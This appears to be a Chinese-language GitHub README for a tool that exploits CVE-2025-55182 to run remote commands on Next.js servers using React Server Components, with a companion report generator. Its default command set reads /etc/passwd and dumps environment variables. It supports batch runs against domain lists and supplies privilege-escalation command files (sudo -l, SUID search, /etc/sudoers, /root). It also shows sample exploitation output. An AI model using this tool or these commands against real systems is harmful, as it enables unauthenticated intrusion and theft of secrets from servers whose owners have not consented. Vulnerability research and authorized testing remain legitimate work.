rix4uni/CVE-2025-55182
GitHub: rix4uni/CVE-2025-55182
针对利用 React Server Components 的 Next.js 应用漏洞检测工具,支持远程代码执行验证及自动化报告生成。
Stars: 3 | Forks: 1
## CVE-2025-55182
一个命令行工具,用于在使用 React Server Components 的 Next.js 应用程序中检测 CVE-2025-55182 和 CVE-2025-66478。
## 🚀 安装说明
```
wget -q -O /usr/bin/CVE-2025-55182 https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/CVE-2025-55182 && chmod +x /usr/bin/CVE-2025-55182
wget -q -O /usr/bin/reportgenerator https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/reportgenerator && chmod +x /usr/bin/reportgenerator
```
## 🛠️ 使用方法
### CVE-2025-55182 扫描器
#### 基本语法
```
CVE-2025-55182 -d https://example.com
```
#### 选项
| 选项 | 描述 | 默认值 |
|--------|-------------|---------|
| `-d, --domain` | 目标 URL(如果未指定协议,则自动添加 https://) | `http://localhost:3000` |
| `-c, --command` | 要执行的单个命令 | - |
| `-m, --multiple` | 多个命令,用分号分隔 | - |
| `-f, --file` | 包含命令的文件(每行一个) | - |
| `-h, --help` | 显示帮助信息 | - |
*注意:如果未提供命令选项,则执行默认命令。*
#### 默认命令
该工具默认执行以下命令:
1. `cat /etc/os-release` - 操作系统信息
2. `whoami` - 当前用户
3. `pwd` - 当前工作目录
4. `id` - 用户 ID 和组
5. `uname -a` - 系统信息
6. `hostname -I` - 网络接口
7. `ls -la` - 目录列表
8. `cat /etc/passwd` - 用户账户
9. `env` - 环境变量
10. `ps aux` - 运行中的进程
### 报告生成器
`reportgenerator` 工具根据扫描结果自动生成专业的漏洞披露报告。
#### 功能特性
- 多个目标的**并行扫描**
- **自动编号**,保留现有报告(不会覆盖)
- 带有安全漏洞披露部分的**专业 markdown 报告**
- **自定义研究员姓名**和输入文件
#### 基本用法
```
# 创建包含目标域的文件
echo -e "https://target1.com\nhttps://target2.com" > subs.txt
# 运行 report generator
reportgenerator
```
#### 选项
| 标志 | 描述 | 默认值 |
|------|-------------|---------|
| `--file` | 包含目标域的输入文件 | `subs.txt` |
| `--user` | 披露部分的研究员姓名 | `Bhagirath Saxena` |
#### 示例
```
# 使用默认设置 (subs.txt, Bhagirath Saxena)
reportgenerator
# 使用自定义目标文件
reportgenerator --file targets.txt
# 使用自定义研究者名称
reportgenerator --user "John Doe"
# 同时使用自定义选项
reportgenerator --file my-targets.txt --user "Jane Smith"
```
#### 输出结构
报告在两个目录中生成:
- `textfile/` - 原始扫描输出(编号为:`1.txt`、`2.txt` 等)
- `mdfile/` - 专业 markdown 报告(编号为:`1.md`、`2.md` 等)
**注意:**自动编号功能确保现有报告永远不会被覆盖。新扫描从现有的最大编号继续。
#### 报告格式
每份生成的报告包括:
1. **安全漏洞披露** - 专业介绍函
2. **目标** - 被测试的域名
3. **执行的命令** - 测试期间运行的命令列表
4. **漏洞摘要** - CVE 详细信息和影响评估
5. **利用细节** - 带有执行状态的命令输出
6. **执行摘要** - 显示每个命令成功/失败的表格
7. **影响分析** - 严重程度评估和观察结果
8. **建议** - 针对安全团队的补救步骤
9. **参考** - CVE 详细信息和安全公告的链接
## 🎨 输出示例
### 成功利用
```
▼ 🎯 TARGET: https://vulnerable-app.com
▼ 📋 COMMANDS TO RUN: 10
• cat /etc/os-release
• whoami
• pwd
• id
• uname -a
• hostname -I
• ls -la
• cat /etc/passwd
• env
• ps aux
[1/10] Executing: cat /etc/os-release
▼ 💻 OS INFORMATION
║ NAME="Ubuntu"
║ VERSION="22.04.3 LTS (Jammy Jellyfish)"
║ ID=ubuntu
║ ID_LIKE=debian
║ PRETTY_NAME="Ubuntu 22.04.3 LTS"
║ ...
[2/10] Executing: whoami
▼ 👤 CURRENT USER
║ www-data
...
[3/10] Executing: pwd
▼ 📂 CURRENT DIRECTORY
║ /var/www/html
...
```
### 部分成功
```
[6/10] Executing: hostname -I
╔════════════════════════════════════════════════════════════╗
║ Command failed: hostname -I
║ This command might not be available or the server rejected it
╚════════════════════════════════════════════════════════════╝
[!] Trying alternative network command...
▼ 🌐 NETWORK INTERFACES (alternative)
║ 1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
║ link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
║ inet 127.0.0.1/8 scope host lo
║ valid_lft forever preferred_lft forever
...
```
## 🔧 技术细节
### 漏洞
- **CVE**: CVE-2025-55182
- **类型**: 原型污染 → RCE
- **受影响**: 具有特定配置的 Next.js 应用程序
- **向量**: 带有精心构造的 multipart/form-data 的 HTTP POST 请求
- **影响**: 以应用程序用户身份进行未经身份验证的远程代码执行
## 📚 参考
- [CVE-2025-55182 详情](https://nvd.nist.gov/vuln/detail/CVE-2025-55182)
- [Next.js 安全公告](https://github.com/vercel/next.js/security/advisories/GHSA-9qr9-h5gf-34mp)
### `commands/` 目录示例:
为不同场景创建示例命令文件:
```
# commands/basic-recon.txt
whoami
id
uname -a
cat /etc/os-release
hostname
```
```
# commands/network-recon.txt
ifconfig
netstat -tulpn
iptables -L
cat /etc/hosts
cat /etc/resolv.conf
```
```
# commands/privilege-escalation.txt
sudo -l
find / -perm -4000 2>/dev/null
cat /etc/sudoers
ls -la /root/
```
标签:CISA项目, Cutter, CVE-2025-55182, CVE-2025-66478, Go语言工具, RCE, React Server Components, URL发现, Web安全, 前端安全, 安全检测, 应用安全, 无服务器架构, 漏洞报告生成, 编程工具, 网络安全, 蓝队分析, 远程代码执行, 隐私保护